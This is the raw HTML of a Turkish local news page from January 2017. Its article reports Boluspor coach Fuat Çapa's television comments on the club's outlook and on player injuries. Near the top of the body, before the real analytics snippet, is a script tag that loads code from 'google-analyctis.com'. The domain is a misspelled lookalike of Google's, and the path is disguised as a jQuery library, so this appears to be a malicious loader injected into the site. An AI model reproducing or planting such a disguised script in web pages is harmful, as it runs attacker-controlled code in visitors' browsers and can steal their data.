<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="tr-TR" itemscope itemtype="http://schema.org/NewsArticle">
<head>
<base href="http://www.bolugundem.com/" target="_self"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Refresh" content="300" />
<title>ÇAPA&#039;DAN ÖNEMLİ AÇIKLAMALAR</title>
<meta name="description" content="Boluspor teknik direktörü Fuat Çapa Merkez TV&#039;de katıldığı Orta ve Gol programında önemli açıklamalarda bulundu. Çapa Boluspor&#039;da ayrılık gibi gönderilme gibi bir konunun olmadığını Boluspor&#039;un 27.veya 28. haftada istediği yerde olacağının altına çizdi." />
<link rel="canonical" href="http://www.bolugundem.com/capadan-onemli-aciklamalar-103603h.htm" />
<link rel="alternate" href="http://www.bolugundem.com/mobi/news_detail.php?id=103603" media="only screen and (max-width: 640px)" />
<link rel="image_src" type="image/jpeg" href="http://www.bolugundem.com/d/news/88155.jpg" />
<meta name="DC.date.issued" content="2017-01-24T13:05:22+02:00" />
<meta property="og:site_name" content="Bolu Gündem Gazetesi" />
<meta property="og:url" content="http://www.bolugundem.com/capadan-onemli-aciklamalar-103603h.htm" />
<meta property="og:title" content="ÇAPA&#039;DAN ÖNEMLİ AÇIKLAMALAR" />
<meta property="og:description" content="Boluspor teknik direktörü Fuat Çapa Merkez TV&#039;de katıldığı Orta ve Gol programında önemli açıklamalarda bulundu. Çapa Boluspor&#039;da ayrılık gibi gönderilme gibi bir konunun olmadığını Boluspor&#039;un 27.veya 28. haftada istediği yerde olacağının altına çizdi." />
<meta property="og:image" content="http://www.bolugundem.com/d/news/88155.jpg" />
<meta property="og:type" content="article" />
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@">
<meta name="twitter:url" content="http://www.bolugundem.com/capadan-onemli-aciklamalar-103603h.htm">
<meta name="twitter:title" content="ÇAPA&#039;DAN ÖNEMLİ AÇIKLAMALAR" />
<meta name="twitter:description" content="Boluspor teknik direktörü Fuat Çapa Merkez TV&#039;de katıldığı Orta ve Gol programında önemli açıklamalarda bulundu. Çapa Boluspor&#039;da ayrılık gibi gönderilme gibi bir konunun olmadığını Boluspor&#039;un 27.veya 28. haftada istediği yerde olacağının altına çizdi." />
<meta name="twitter:image" content="http://www.bolugundem.com/d/news/88155.jpg" />
<meta itemprop="thumbnailUrl" content="http://www.bolugundem.com/d/news_t/88155.jpg" />
<meta itemprop="articleSection" content="Spor" />
<meta itemprop="dateCreated" content="2017-01-24T13:05:22+02:00" />
<meta itemprop="dateModified" content="2017-01-24T13:05:22+02:00" />
<meta itemprop="image" content="http://www.bolugundem.com/d/news/88155.jpg" />
<link href="http://www.bolugundem.com/s/style.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://www.bolugundem.com/s/function.js"></script><meta name="google-site-verification" content="_3Ay3IQ64zgnagdr5ShjUTUQtGr6MxenZ5w_W5i7_ok" /></head>
<body class="body_main">
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-59291068-1', 'auto');
  ga('send', 'pageview');
</script><div class="CM_pageskin"><div class="left"><div class="banner_code"><script type="text/javascript">getNormalSWF("175", "300", "http://www.bolugundem.com/d/banner/bilim-okullari-banner-web-2.swf");</script>

<a style="display: block; background-image: url('http://www.bolugundem.com/d/banner/otoilan.png'); background-color: transparent; width: 175px; height: 40px; background-repeat: no-repeat;" width="300" height="40" href="http://www.bolugundem.com/oto-ilan-7s.htm"></a>

<iframe width="175" height="400" frameborder="0" border="0" scrolling="no" marginheight="1" marginwidth="1" src="http://www.ahmetotogaleri.com/otoilan_frame.php" name="otoilan">
</iframe></div></div><div class="right"><div class="banner_code"><a href="http://www.finalegitim.com.tr" target="_blank"><img src="http://www.bolugundem.com/d/banner/final-haziran2016.20160720131739.jpg" width="175" height="320" border="0" alt=""/></a></div></div></div><div class="main_container"><div class="base_topbar_outer"><div class="base_topbar base_position"><ul class="quick_launch"><li class="parent"><a href="http://www.bolugundem.com//" target="_self">Ana Sayfa</a></li><li class="parent"><a href="http://www.bolugundem.com/guest_book.php" target="_self">Ziyaretçi Defteri</a></li><li class="parent"><a href="http://www.bolugundem.com/sitene-ekle.htm" target="_self">Sitene Ekle</a></li><li class="parent"><a href="http://www.bolugundem.com/search_result.php" target="_self">Arşiv</a></li><li class="sole"><a href="http://www.bolugundem.com/e_gazette.php" target="_self">E- Gazete</a></li><li class="parent"><a href="#" target="_self" onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.bolugundem.com');return false;">Anasayfam Yap</a></li></ul><div class="currency_slider" id="currency_slider"><div class="viewport"><ul class="overview"><li class="up"><span><b>BIST</b> 83.243</span></li><li class="up"><span><b>Altın</b> 149,216</span></li><li class="up"><span><b>Dolar</b> 3,8261</span></li><li class="up"><span><b>Euro</b> 4,1052</span></li></ul></div></div><div class="weather_slider" id="weather_slider"><div class="viewport"><ul class="overview"><li style="background-position: -3px -812px;"><span>Bolu</span> -1 °C</li><li style="background-position: -3px -812px;"><span>İstanbul</span> 6 °C</li><li style="background-position: -3px -580px;"><span>Ankara</span> -6 °C</li></ul></div></div><form action="search_result.php" method="get"><input class="search_input" type="text" name="search_key" placeholder="Site içi arama" /><input class="search_button" type="submit" value="" /></form></div></div><div class="base_outer clearfix"><div class="banner wide_banner" style="padding-top: 10px;"><div class="inner" id="banner_logo_top"><script src='http://ads.wordego.com/a.js?did=3965756b57503730345231474e536a76626a325248773d3d&size=970x90' type='text/javascript'></script></div></div><div class="base_top base_position"><div class="logo"><a href="http://www.bolugundem.com/" rel="home"><img src="http://www.bolugundem.com/s/i/logo.png" alt="Bolu Gündem Gazetesi" width="250" height="130" /></a></div><div class="banner_spec"><a href="" target=""><img src="http://www.bolugundem.com/d/banner/erdal-yeni-logo.png" width="220" height="124" border="0" alt=""/></a></div><div class="banner"><a href="" target=""><img src="http://www.bolugundem.com/d/banner/reklam-logo.jpg" width="480" height="130" border="0" alt=""/></a></div><div class="nav-mini"><a href="http://www.bolugundem.com/" title="Anasayfa" rel="home"></a></div><div class="nav-mini-2"><a href="http://www.bolugundem.com/foto-galeri.htm" title="Foto Galeri"></a><a href="http://www.bolugundem.com/video-galeri.htm" title="Video Galeri"></a></div><div class="last_min" id="last_min"><div class="viewport"><ul class="overview"><li><a href="http://www.bolugundem.com/tutuklanmam-aklimi-basima-getirdi-103605h.htm">“Tutuklanmam aklımı başıma getirdi”</a></li><li><a href="http://www.bolugundem.com/erpilic-kalite-citasini-yukseltecek-103604h.htm">ERPİLİÇ KALİTE ÇITASINI YÜKSELTECEK</a></li><li><a href="http://www.bolugundem.com/capadan-onemli-aciklamalar-103603h.htm">ÇAPA'DAN ÖNEMLİ AÇIKLAMALAR</a></li><li><a href="http://www.bolugundem.com/kupada-duduk-sakada-103602h.htm">Kupada düdük Saka'da!..</a></li><li><a href="http://www.bolugundem.com/fuat-capa-ile-devam-103601h.htm">FUAT ÇAPA İLE DEVAM...</a></li><li><a href="http://www.bolugundem.com/bylockcu-jandarmalar-adliyede-103600h.htm">Bylock'cu jandarmalar adliyede</a></li><li><a href="http://www.bolugundem.com/uyusturucu-tacirleri-adliyede-103599h.htm">Uyuşturucu tacirleri adliyede</a></li><li><a href="http://www.bolugundem.com/liglere-11-subata-kadar-ara-103597h.htm">Liglere 11 Şubat'a kadar ara</a></li><li><a href="http://www.bolugundem.com/darica-bolu-maci-a-sporda-103596h.htm">Darıca-Bolu maçı A Spor'da</a></li><li><a href="http://www.bolugundem.com/cavcav-son-yolculuguna-ugurlandi-103595h.htm">Cavcav son yolculuğuna uğurlandı</a></li><li><a href="http://www.bolugundem.com/temiz-kagidi-alan-ise-iade-edilecek-103594h.htm">'Temiz Kâğıdı' Alan işe iade edilecek</a></li><li><a href="http://www.bolugundem.com/mogolistanli-ogrencilerden-bolu-belediyesine-ziyaret-103593h.htm">Moğolistanlı öğrencilerden Bolu Belediyesi’ne ziyaret</a></li><li><a href="http://www.bolugundem.com/kan-bagisi-surekli-bir-ihtiyactirbaglanti-103592h.htm">KAN BAĞIŞI SÜREKLİ BİR İHTİYAÇTIRBağlantı</a></li><li><a href="http://www.bolugundem.com/baskan-bulut-saglikli-ortamlarda-alisveris-imkani-saglayacagiz-103591h.htm">BAŞKAN BULUT” SAĞLIKLI ORTAMLARDA ALIŞVERİŞ İMKANI SAĞLAYACAĞIZ”</a></li><li><a href="http://www.bolugundem.com/siki-takip-103590h.htm">Sıkı takip</a></li></ul></div></div><div class="social"><a href="https://www.facebook.com/bolugundem" style="background-position: left -168px;" target="_blank" title="Facebook ile paylaş"></a><a href="http://www.bolugundem.com/rss/" style="background-position: left -144px;" target="_blank" title="RSS, News Feed, Haber Beslemesi"></a></div><ul class="nav"><li class="sep2"></li><li class="item parent"><a class="inr" href="http://www.bolugundem.com/resmi-ilanlar-haberleri-14hk.htm" target="_self"><span>RESMİ İLANLAR</span></a></li><li class="sep"></li></ul></div></div><div class="base_outer"><div id="base" class="base base_position clearfix"><div id="base_middle" class="base_middle"><div class="middle_content_title"><h1 itemprop="name">ÇAPA'DAN ÖNEMLİ AÇIKLAMALAR</h1></div><div class="middle_content_top"><div class="top_social"><script type="text/javascript">showBookmark3();</script></div><div class="nav" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://www.bolugundem.com/" rel="home"><span itemprop="title">Ana Sayfa</span></a><span itemprop="child" itemscope itemtype="http://data-vocabulary.org/Breadcrumb">&raquo; <a itemprop="url" href="http://www.bolugundem.com/spor-haberleri-139hk.htm" rel="self"><span itemprop="title">Spor</span></a></span></div><div class="text_size"><img src="http://www.bolugundem.com/s/i/1x1.gif" onclick="changeFontSize('#news_content', 'd');" title="Yazıyı küçült" width="24" height="18" alt="" /><img src="http://www.bolugundem.com/s/i/1x1.gif" onclick="changeFontSize('#news_content', 'u');" title="Yazıyı büyüt" width="24" height="18" alt="" /></div><div class="tools"><a class="go_comment" rel="nofollow" href="#" onclick="$.scrollTo('.comment_add', 600); return false;" target="_blank" title="Yorum Yap"></a><a class="go_send" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_520x390('http://www.bolugundem.com/send_to_friend.php?type=1&amp;id=103603');" title="Arkadaşına Gönder"></a><a class="go_print" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_670x500('http://www.bolugundem.com/print.php?type=1&amp;id=103603')" title="Yazdır"></a></div><div class="top_date" itemprop="datePublished" content="2017-01-24T12:04:00+02:00">24.01.2017 12:04</div></div><div class="middle_content"><div class="news_detail"><div class="side_detail"><img itemprop="image" class="image" src="http://www.bolugundem.com/d/news/88155.jpg" alt="ÇAPA&#039;DAN ÖNEMLİ AÇIKLAMALAR" width="300" height="225" /></div><div itemprop="description" class="short_content">Boluspor teknik direktörü Fuat Çapa Merkez TV'de katıldığı Orta ve Gol programında önemli açıklamalarda bulundu. Çapa Boluspor'da ayrılık gibi gönderilme gibi bir konunun olmadığını Boluspor'un 27.veya 28. haftada istediği yerde olacağının altına çizdi.</div><div itemprop="articleBody" id="news_content" class="text_content"><p><u><strong>Haber: Uğur Balaban</strong></u></p><p>Serkan Erkan'ın sunduğu teknik direktör Ali Beykoz, Soner Çavuşoğlu ve Koray Yılmazdemir'in yorumlarıyla katıldığı programda Boluspor'un gidişatı ile ilgili önemli açıklamalarda bulundu. Çapa Boluspor'un bir kaç hafta sonra daha iyi olacağını önemli bir seri yakalayarak 27.ve 28.haftada ekibimizin istediği yerde olacağını belirtti. Çapa ayrıca Santos'un bu haftada forma giymesinin mümkün olmadığını Mersin idmanyurdu maçına kadar hazır olmasını beklediğini söyledi. Çapa ayrıca Anco Jansen'in sakatlığının henüz geçmediğini bir gün kendisini iyi hissettiğini, bir gün ağrılarının yeniden nüksettiğini belirtti. Elazığ maçı sonrası lige verilecek arada takımın toparlanacağını belirten Çapa fikstür avantajının Boluspor'da olduğunu, kalan maçlarda Boluspor taraftarının daha iyi bir Boluspor izleyeceğini belirtti.</p></div><div class="clear"></div></div><script type="text/javascript">showBookmark5("https://www.facebook.com/bolugundem", "", "");</script><div class="comment_navigation"><div class="container"><div class="tools"><a class="go_send" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_520x390('http://www.bolugundem.com/send_to_friend.php?type=1&amp;id=103603');" title="Arkadaşına Gönder"></a><a class="go_print" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_670x500('http://www.bolugundem.com/print.php?type=1&amp;id=103603')" title="Yazdır"></a><a class="go_top" rel="nofollow" href="/capadan-onemli-aciklamalar-103603h.htm#top" onclick="scrollPage(0); return false;" title="Yukarı"></a></div><script type="text/javascript">showBookmark4();</script></div></div><div class="comment_add"><form method="post" id="comment_form" onsubmit="return addComment(1, 103603);"><textarea name="comment_content" id="comment_content" class="comment_content" rows="6" placeholder="Yorumunuz" maxlength="500"></textarea><input type="text" name="member_name" id="member_name" class="member_name" placeholder="Adınız" /><input type="submit" name="comment_submit" id="comment_submit" class="comment_submit" value="GÖNDER" /><input type="hidden" name="reply" id="reply" value="0" /><div class="reply_to"></div></form><div class="info"><b>UYARI:</b> Küfür, hakaret, rencide edici cümleler veya imalar, inançlara saldırı içeren, imla kuralları ile yazılmamış,<br /> Türkçe karakter kullanılmayan ve büyük harflerle yazılmış yorumlar onaylanmamaktadır.</div></div><div class="comment"><div class="container"><div class="content" align="center">Bu habere henüz yorum eklenmemiştir.</div></div><div class="btm"></div></div><div class="latest_gallery"><div class="caption">SON EKLENEN <span>GALERİLER</span></div><ul class="content"><li><a class="image icon_1" href="http://www.bolugundem.com/zehir-tacirleri-adliyeye-sevk-edildi-1741g.htm"><img src="http://www.bolugundem.com/d/gallery/1741_s.jpg" alt="Zehir tacirleri adliyeye sevk edildi" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/zehir-tacirleri-adliyeye-sevk-edildi-1741g.htm">Zehir tacirleri adliyeye sevk edildi</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/padisahtan-alindi-halka-verildi-simdi-halktan-tekrar-aliniyor-1740g.htm"><img src="http://www.bolugundem.com/d/gallery/1740_s.jpg" alt="Padişahtan alındı halka verildi Şimdi halktan tekrar alınıyor”" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/padisahtan-alindi-halka-verildi-simdi-halktan-tekrar-aliniyor-1740g.htm">Padişahtan alındı halka verildi Şimdi halktan tekrar alınıyor”</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/baskan-cevik-kendisi-karne-almis-gibi-sevindi-1739g.htm"><img src="http://www.bolugundem.com/d/gallery/1739_s.jpg" alt="Başkan Çevik kendisi karne almış gibi sevindi" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/baskan-cevik-kendisi-karne-almis-gibi-sevindi-1739g.htm">Başkan Çevik kendisi karne almış gibi sevindi</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/biber-10-yasinda-1738g.htm"><img src="http://www.bolugundem.com/d/gallery/1738_s.jpg" alt="Biber 10 yaşında" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/biber-10-yasinda-1738g.htm">Biber 10 yaşında</a></li></ul></div><div class="middle_sub_page_title"><span>Diğer Haberler</span></div><div class="news_set"><div class="inner clearfix"><div><a class="image" href="http://www.bolugundem.com/capadan-onemli-aciklamalar-103603h.htm"><img src="http://www.bolugundem.com/d/news_t/88155.jpg" alt="ÇAPA&#039;DAN ÖNEMLİ AÇIKLAMALAR" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/capadan-onemli-aciklamalar-103603h.htm"><span>ÇAPA'DAN ÖNEMLİ AÇIKLAMALAR</span>Boluspor teknik direktörü Fuat Çapa Merkez TV'de katıldığı Orta ve Gol programında önemli açıklamalarda bulundu. Çapa Boluspor'da ayrılık gibi gönderilme gibi bir konunun olmadığını Boluspor'un 27.veya 28. haftada istediği yerde olacağının altına çizdi.</a></div><div><a class="image" href="http://www.bolugundem.com/kupada-duduk-sakada-103602h.htm"><img src="http://www.bolugundem.com/d/news_t/88154.jpg" alt="Kupada düdük Saka&#039;da!.." width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/kupada-duduk-sakada-103602h.htm"><span>Kupada düdük Saka'da!..</span>Ziraat Türkiye Kupası grup müsabakalarının son haftasında oynanacak maçlarda görev yapacak hakemler belli oldu. Buna göre Darıca Gençlerbirliği-Boluspor maçında Sarper Barış Saka düdük çalacak.</a></div><div><a class="image" href="http://www.bolugundem.com/fuat-capa-ile-devam-103601h.htm"><img src="http://www.bolugundem.com/d/news_t/88153.jpg" alt="FUAT ÇAPA İLE DEVAM..." width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/fuat-capa-ile-devam-103601h.htm"><span>FUAT ÇAPA İLE DEVAM...</span>Necip Çarıkçı, Fuat Çapa ile yollarına devam ettiklerini söyledi.</a></div><div><a class="image" href="http://www.bolugundem.com/liglere-11-subata-kadar-ara-103597h.htm"><img src="http://www.bolugundem.com/d/news_t/88146.jpg" alt="Liglere 11 Şubat&#039;a kadar ara" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/liglere-11-subata-kadar-ara-103597h.htm"><span>Liglere 11 Şubat'a kadar ara</span>TFF 1.Lige ve Spor Toto Süper Lig'e hafta sonunda oynanacak olan 19.hafta maçları sonrası, Ziraat Türkiye Kupası  son 16 Tur müsabakaları nedeniyle 11 Şubat'a kadar ara verilecek.</a></div><div><a class="image" href="http://www.bolugundem.com/darica-bolu-maci-a-sporda-103596h.htm"><img src="http://www.bolugundem.com/d/news_t/88145.jpg" alt="Darıca-Bolu maçı A Spor&#039;da" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/darica-bolu-maci-a-sporda-103596h.htm"><span>Darıca-Bolu maçı A Spor'da</span>Ziraat Türkiye Kupası'nda gruplarda oynanacak olan 6.ve son maçların naklen yayın programı açıklandı. Yapılan açıklamaya göre Darıca Gençlerbirliği-Boluspor maçı A Spor'dan naklen yayınlanacak.</a></div><div><a class="image" href="http://www.bolugundem.com/cavcav-son-yolculuguna-ugurlandi-103595h.htm"><img src="http://www.bolugundem.com/d/news_t/88144.jpg" alt="Cavcav son yolculuğuna uğurlandı" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/cavcav-son-yolculuguna-ugurlandi-103595h.htm"><span>Cavcav son yolculuğuna uğurlandı</span>Boluspor Kulüp Başkanı Necip Çarıkcı ile yakın dost olduğu bilinen, geçtiğimiz gün hayatını kaybeden Türk futbolunun duayen isimlerinden Gençlerbirliği Başkanı İlhan Cavcav için kulüp tesislerinde tören düzenlendi.</a></div></div></div><div class="news_list_view"><li><a href="http://www.bolugundem.com/buyukelci-oka-musabakalari-izledi-103598h.htm">Büyükelçi Oka müsabakaları izledi</a><span>24 Ocak 2017 Salı 09:32</span></li><li><a href="http://www.bolugundem.com/istifa-degil-alttan-isitma-istiyor-103571h.htm">İstifa değil, alttan ısıtma istiyor</a><span>23 Ocak 2017 Pazartesi 10:45</span></li><li><a href="http://www.bolugundem.com/sultanlar-lideri-devirdi-3-0-103570h.htm">Sultanlar lideri devirdi: 3-0</a><span>23 Ocak 2017 Pazartesi 10:42</span></li><li><a href="http://www.bolugundem.com/basketbolda-bir-zafer-daha-103569h.htm">Basketbolda bir zafer daha</a><span>23 Ocak 2017 Pazartesi 10:39</span></li><li><a href="http://www.bolugundem.com/inkilap-bursada-yara-aldi-3-1-103568h.htm">İnkılap Bursa&#039;da yara aldı: 3-1</a><span>23 Ocak 2017 Pazartesi 10:37</span></li><li><a href="http://www.bolugundem.com/kecioren-geredeye-acimadi-3-2-103567h.htm">Keçiören Gerede&#039;ye acımadı: 3-2</a><span>23 Ocak 2017 Pazartesi 10:34</span></li><li><a href="http://www.bolugundem.com/boluspor-taraftarini-baskan-karsiladi-103566h.htm">BOLUSPOR TARAFTARINI BAŞKAN KARŞILADI</a><span>23 Ocak 2017 Pazartesi 10:30</span></li><li><a href="http://www.bolugundem.com/boluspor-camiasi-merakla-bekliyor-103565h.htm">BOLUSPOR CAMİASI MERAKLA BEKLİYOR</a><span>23 Ocak 2017 Pazartesi 10:26</span></li><li><a href="http://www.bolugundem.com/kalan-maclarin-cogu-boluda-103564h.htm">Kalan maçların çoğu Bolu&#039;da</a><span>23 Ocak 2017 Pazartesi 10:21</span></li><li><a href="http://www.bolugundem.com/uluslararasi-turnuva-boluda-103563h.htm">Uluslararası turnuva Bolu&#039;da..</a><span>23 Ocak 2017 Pazartesi 10:19</span></li></div></div></div><div id="base_side" class="base_side"><div class="side_caption"><span>ÜYE İŞLEMLERİ</span></div><div class="side_content"><div class="member_box" id="loginbox_container"></div></div><div class="side_content_bottom"></div><div class="side_caption side_caption_2"><a href="http://www.bolugundem.com/yazarlar.htm">YAZARLAR</a></div><div class="side_content"><div class="author_side" id="author_side_1"><div class="viewport"><ul class="overview"><li><a class="content" href="http://www.bolugundem.com/ne-oldu-bize-15375yy.htm">Mustafa Namdar<span>NE OLDU BİZE</span></a><a class="image" href="http://www.bolugundem.com/ne-oldu-bize-15375yy.htm"><img src="http://www.bolugundem.com/d/author/10_s.jpg" alt="Mustafa Namdar" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/garip-15372yy.htm">Aydın Hitit<span>GARİP</span></a><a class="image" href="http://www.bolugundem.com/garip-15372yy.htm"><img src="http://www.bolugundem.com/d/author/348_s.jpg" alt="Aydın Hitit" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/rektor-cinci-hocaya-gitti-mi-15371yy.htm">Hüseyin KAYA<span>Rektör Cinci hoca’ya gitti mi?</span></a><a class="image" href="http://www.bolugundem.com/rektor-cinci-hocaya-gitti-mi-15371yy.htm"><img src="http://www.bolugundem.com/d/author/391_s.jpg" alt="Hüseyin KAYA" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/agir-aksak-eksik-15370yy.htm">Makinist<span>Ağır aksak eksik</span></a><a class="image" href="http://www.bolugundem.com/agir-aksak-eksik-15370yy.htm"><img src="http://www.bolugundem.com/d/author/386_s.jpg" alt="Makinist" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/vurun-kahpeye-15369yy.htm">İlhami Candemir<span>Vurun Kahpeye</span></a><a class="image" href="http://www.bolugundem.com/vurun-kahpeye-15369yy.htm"><img src="http://www.bolugundem.com/d/author/402_s.jpg" alt="İlhami Candemir" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/medeni-islam-bedevi-islam-15367yy.htm">Hasan Dinç<span>MEDENİ İSLÂM – BEDEVİ İSLÂM</span></a><a class="image" href="http://www.bolugundem.com/medeni-islam-bedevi-islam-15367yy.htm"><img src="http://www.bolugundem.com/d/author/354_s.jpg" alt="Hasan Dinç" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/dunden-bugune-15365yy.htm">Nizamettin YILDIRIM<span>Dünden Bugüne</span></a><a class="image" href="http://www.bolugundem.com/dunden-bugune-15365yy.htm"><img src="http://www.bolugundem.com/d/author/395_s.jpg" alt="Nizamettin YILDIRIM" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/bolunun-kisindan-enstantaneler-15356yy.htm">Cevat Özsoy<span>Bolu&#039;nun Kışından Enstantaneler</span></a><a class="image" href="http://www.bolugundem.com/bolunun-kisindan-enstantaneler-15356yy.htm"><img src="http://www.bolugundem.com/d/author/425_s.jpg" alt="Cevat Özsoy" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/kuresel-isinmada-umit-var-projeler-15349yy.htm">Suat Tosun<span>KÜRESEL ISINMADA ÜMİT VAR PROJELER</span></a><a class="image" href="http://www.bolugundem.com/kuresel-isinmada-umit-var-projeler-15349yy.htm"><img src="http://www.bolugundem.com/d/author/380_s.jpg" alt="Suat Tosun" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/a-i-d-i-y-e-t-d-u-y-g-u-s-u-2-15302yy.htm">Aykut Karagüzel<span>A İ D İ Y E T    D U Y G  U S U - 2</span></a><a class="image" href="http://www.bolugundem.com/a-i-d-i-y-e-t-d-u-y-g-u-s-u-2-15302yy.htm"><img src="http://www.bolugundem.com/d/author/330_s.jpg" alt="Aykut Karagüzel" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/kardelen-kultur-ve-sanat-sarayina-kavusacak-miyiz-15237yy.htm">Şenda Aksungur<span>Kardelen Kültür ve Sanat sarayına kavuşacak mıyız?</span></a><a class="image" href="http://www.bolugundem.com/kardelen-kultur-ve-sanat-sarayina-kavusacak-miyiz-15237yy.htm"><img src="http://www.bolugundem.com/d/author/382_s.jpg" alt="Şenda Aksungur" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/belediyeler-vatana-ihanet-etme-yeri-degildir-15186yy.htm">Bülent Dinçtürk<span>BELEDİYELER VATANA İHANET ETME YERİ DEĞİLDİR</span></a><a class="image" href="http://www.bolugundem.com/belediyeler-vatana-ihanet-etme-yeri-degildir-15186yy.htm"><img src="http://www.bolugundem.com/d/author/55_s.jpg" alt="Bülent Dinçtürk" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/fani-dunyaya-devam-45-15087yy.htm">A. Şerafettin Şenyüz<span>Fani Dünya’ya devam (45)</span></a><a class="image" href="http://www.bolugundem.com/fani-dunyaya-devam-45-15087yy.htm"><img src="http://www.bolugundem.com/d/author/351_s.jpg" alt="A. Şerafettin Şenyüz" width="45" height="54" /></a></li></ul></div><div class="side_tiny_pager"><div class="buttons prev" title="Geri"></div><div class="pager"><span class="pagenum" data-index="0">1</span><span class="pagenum" data-index="1">2</span><span class="pagenum" data-index="2">3</span></div><div class="buttons next" title="İleri"></div></div></div></div><div class="side_content_bottom"></div><div class="banner side_banner"><script src='http://ads.wordego.com/a.js?did=3965756b57503730345231474e536a76626a325248773d3d&size=300x250' type='text/javascript'></script></div><div class="side_caption side_caption_3"><a href="http://www.bolugundem.com/foto-galeri.htm">FOTO GALERİ</a></div><div class="side_content"><ul class="gallery_side" id="gallery_side"><li class="item"><a href="http://www.bolugundem.com/zehir-tacirleri-adliyeye-sevk-edildi-1741g.htm"><img src="http://www.bolugundem.com/d/gallery/1741_s.jpg" alt="Zehir tacirleri adliyeye sevk edildi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Zehir tacirleri adliyeye sevk edildi</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/padisahtan-alindi-halka-verildi-simdi-halktan-tekrar-aliniyor-1740g.htm"><img src="http://www.bolugundem.com/d/gallery/1740_s.jpg" alt="Padişahtan alındı halka verildi Şimdi halktan tekrar alınıyor”" width="127" height="96" /><span class="tl"></span><span class="wrapword">Padişahtan alındı halka verildi Şimdi halktan tekrar alınıyor”</span></a></li><li class="item"><a href="http://www.bolugundem.com/baskan-cevik-kendisi-karne-almis-gibi-sevindi-1739g.htm"><img src="http://www.bolugundem.com/d/gallery/1739_s.jpg" alt="Başkan Çevik kendisi karne almış gibi sevindi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Başkan Çevik kendisi karne almış gibi sevindi</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/biber-10-yasinda-1738g.htm"><img src="http://www.bolugundem.com/d/gallery/1738_s.jpg" alt="Biber 10 yaşında" width="127" height="96" /><span class="tl"></span><span class="wrapword">Biber 10 yaşında</span></a></li></ul><div class="side_content_pager gallery_side_pager"><div class="pager"><span data-value="1">1</span><span data-value="2">2</span><span data-value="3">3</span><span data-value="4">4</span><span data-value="5">5</span><span data-value="6">6</span><span data-value="7">7</span><span data-value="8">8</span></div></div></div><div class="side_content_bottom"></div><div class="side_caption"><a href="http://www.bolugundem.com/video-galeri.htm">VİDEO GALERİ</a></div><div class="side_content"><ul class="gallery_side" id="video_side"><li class="item"><a href="http://www.bolugundem.com/seben-tanitim-filmi-139v.htm"><img src="http://www.bolugundem.com/d/video/139.jpg" alt="Seben tanıtım filmi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Seben tanıtım filmi</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/29-ekim-cumhuriyet-bayraminiz-kutlu-olsun-138v.htm"><img src="http://www.bolugundem.com/d/video/138.jpg" alt="29 Ekim Cumhuriyet Bayramınız Kutlu Olsun" width="127" height="96" /><span class="tl"></span><span class="wrapword">29 Ekim Cumhuriyet Bayramınız Kutlu Olsun</span></a></li><li class="item"><a href="http://www.bolugundem.com/sehit-ziya-sarpkaya-klibi-137v.htm"><img src="http://www.bolugundem.com/d/video/137.jpg" alt="Şehit Ziya Sarpkaya Klibi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Şehit Ziya Sarpkaya Klibi</span></a></li><li class="sep"></li><li class="item"><a href="http://www.bolugundem.com/yumurta-aldilar-altini-kaptilar-136v.htm"><img src="http://www.bolugundem.com/d/video/136.jpg" alt="Yumurta aldılar altını kaptılar" width="127" height="96" /><span class="tl"></span><span class="wrapword">Yumurta aldılar altını kaptılar</span></a></li></ul><div class="side_content_pager video_side_pager"><div class="pager"><span data-value="1">1</span><span data-value="2">2</span><span data-value="3">3</span><span data-value="4">4</span><span data-value="5">5</span><span data-value="6">6</span><span data-value="7">7</span><span data-value="8">8</span></div></div></div><div class="side_content_bottom"></div><div class="banner side_banner"><iframe frameborder="0" 